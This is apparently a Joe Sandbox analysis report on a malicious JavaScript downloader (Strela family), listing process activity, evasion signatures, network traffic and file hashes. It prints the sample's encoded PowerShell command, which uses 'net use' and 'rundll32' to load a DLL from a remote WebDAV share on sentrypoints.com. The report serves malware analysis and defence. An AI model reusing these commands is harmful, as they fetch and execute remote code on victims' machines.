Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8", "0", "false")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6E097D push E95B72D0h; ret 1_2_00007FFD9B6E09C9

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2250Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 927Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\net.exe TID: 7572Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: net.exe, 00000003.00000003.1718812871.00000222C67EF000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719197825.00000222C683B000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719127387.00000222C67EF000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\sentrypoints.com@8888\davwwwroot\ ;;;;;;;; rundll32 \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry
Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\sentrypoints.com@8888\davwwwroot\ ;;;;;;;; rundll32 \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,EntryJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,EntryJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaowa7adsaowa7adsaowagahiadqbuagqababsadmamgagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadiaoqayaduamgayadqanwazadmamaaxadianwauagqababsacwarqbuahqacgb5aa==
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaowa7adsaowa7adsaowagahiadqbuagqababsadmamgagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadiaoqayaduamgayadqanwazadmamaaxadianwauagqababsacwarqbuahqacgb5aa==Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\rundll32.exeFile opened: \\sentrypoints.com@8888\davwwwroot\229252247330127.dllJump to behavior
Source: C:\Windows\System32\rundll32.exeFile opened: \\sentrypoints.com@8888\davwwwroot\229252247330127.dllJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid Accounts1
Command and Scripting Interpreter
32
Scripting
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS21
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://aka.ms/pscore60%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://crl.v0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sentrypoints.com
94.159.113.48
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://aka.ms/pscore6powershell.exe, 00000001.00000002.1721469464.0000019848A9B000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1721469464.0000019848AE9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://sentrypoints.com:8888/net.exe, 00000003.00000003.1718704357.00000222C681C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000003.1718812871.00000222C67FE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719127387.00000222C67FE000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1721469464.0000019848B1B000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.vpowershell.exe, 00000001.00000002.1722539951.0000019860A80000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://sentrypoints.com:8888/pLnet.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://sentrypoints.com:8888/paceUlnet.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          94.159.113.48
          sentrypoints.comRussian Federation
          49531NETCOM-R-ASRUtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1543762
          Start date and time:2024-10-28 12:02:45 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 26s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:5
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (Javascript)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:1997614539972622565.js
          Detection:MAL
          Classification:mal84.troj.spyw.expl.evad.winJS@8/3@1/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 1
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Stop behavior analysis, all processes terminated
          • Execution Graph export aborted for target powershell.exe, PID 7392 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: 1997614539972622565.js
          TimeTypeDescription
          07:03:40API Interceptor1x Sleep call for process: net.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          94.159.113.481770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          NETCOM-R-ASRU1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          No context
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):0.773832331134527
          Encrypted:false
          SSDEEP:3:NlllulM/l:NllU
          MD5:21F14205CCD420521F20158797DD550F
          SHA1:69A2950F28967FFF781C85FAFDC91F49E1E2A624
          SHA-256:D021F470AB6D211BC08B4DF10B4FD039E582C5BA57F371828643329F9F76E7DE
          SHA-512:8858DF0A62E1FD3D2300CB5A4CF32A15762DDA3EE77DCE440F5382163EAA1A1973704DB2EA6C7D1BFF31C8BAF5F657791595D458BA4A7710FA453CB15833E0D7
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:@...e...........................................................
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          File type:ASCII text, with very long lines (65536), with no line terminators
          Entropy (8bit):4.712544117334504
          TrID:
            File name:1997614539972622565.js
            File size:1'424'760 bytes
            MD5:1d5eeb78265b9887d284bf08d25c3368
            SHA1:f0203afcf43febcb307812d19c6a010ad194a26d
            SHA256:96f7a1602553aaa0f38091bee8055114416a460c7ada60e856ca0882bbbd4127
            SHA512:9426512c01e77282922e2c028dee0c2558bf18abd142afc8e50e9b64cc4ad1b12f2a46b91fe91f23a2d7a2bb711f4c4d21214e6a338023a294d44d4edc056e20
            SSDEEP:24576:IYSWUi932Xw+Vm8sIocNdC5IdEddd6WwsIocNdC5IdEH6yGW:IhQYI5IocNd+Id0ddtVIocNd+IdU6yGW
            TLSH:D4657EAB650BCEFEAD149D98461B3F5208BCD831A922E558750B10D6C7BD0F60EB391F
            File Content Preview:wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkbivgpppaplynswowrgmspvkzjukvpewgghfjoyqkumqvzbcheokrgnezbszpgppolqrpftgussjdteshhfqdnescyvykmfajryzhyujuegsluthkwnuiisqlyswgtuckluworiqkaionxqvrngaknciprvktsdv
            Icon Hash:68d69b8bb6aa9a86
            TimestampSource PortDest PortSource IPDest IP
            Oct 28, 2024 12:03:40.409460068 CET497308888192.168.2.494.159.113.48
            Oct 28, 2024 12:03:40.414921045 CET88884973094.159.113.48192.168.2.4
            Oct 28, 2024 12:03:40.414998055 CET497308888192.168.2.494.159.113.48
            Oct 28, 2024 12:03:40.415709019 CET497308888192.168.2.494.159.113.48
            Oct 28, 2024 12:03:40.421129942 CET88884973094.159.113.48192.168.2.4
            Oct 28, 2024 12:03:41.313864946 CET88884973094.159.113.48192.168.2.4
            Oct 28, 2024 12:03:41.367795944 CET497308888192.168.2.494.159.113.48
            Oct 28, 2024 12:03:41.390045881 CET497308888192.168.2.494.159.113.48
            TimestampSource PortDest PortSource IPDest IP
            Oct 28, 2024 12:03:40.392374992 CET5692353192.168.2.41.1.1.1
            Oct 28, 2024 12:03:40.403871059 CET53569231.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Oct 28, 2024 12:03:40.392374992 CET192.168.2.41.1.1.10xbd34Standard query (0)sentrypoints.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Oct 28, 2024 12:03:40.403871059 CET1.1.1.1192.168.2.40xbd34No error (0)sentrypoints.com94.159.113.48A (IP address)IN (0x0001)false
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.44973094.159.113.4888887556C:\Windows\System32\net.exe
            TimestampBytes transferredDirectionData
            Oct 28, 2024 12:03:40.415709019 CET110OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: DavClnt
            translate: f
            Host: sentrypoints.com:8888
            Oct 28, 2024 12:03:41.313864946 CET191INHTTP/1.1 500 Internal Server Error
            Content-Type: text/plain; charset=utf-8
            X-Content-Type-Options: nosniff
            Date: Mon, 28 Oct 2024 11:03:41 GMT
            Content-Length: 22
            Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
            Data Ascii: Internal server error


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:07:03:37
            Start date:28/10/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js"
            Imagebase:0x7ff6244c0000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:1
            Start time:07:03:37
            Start date:28/10/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
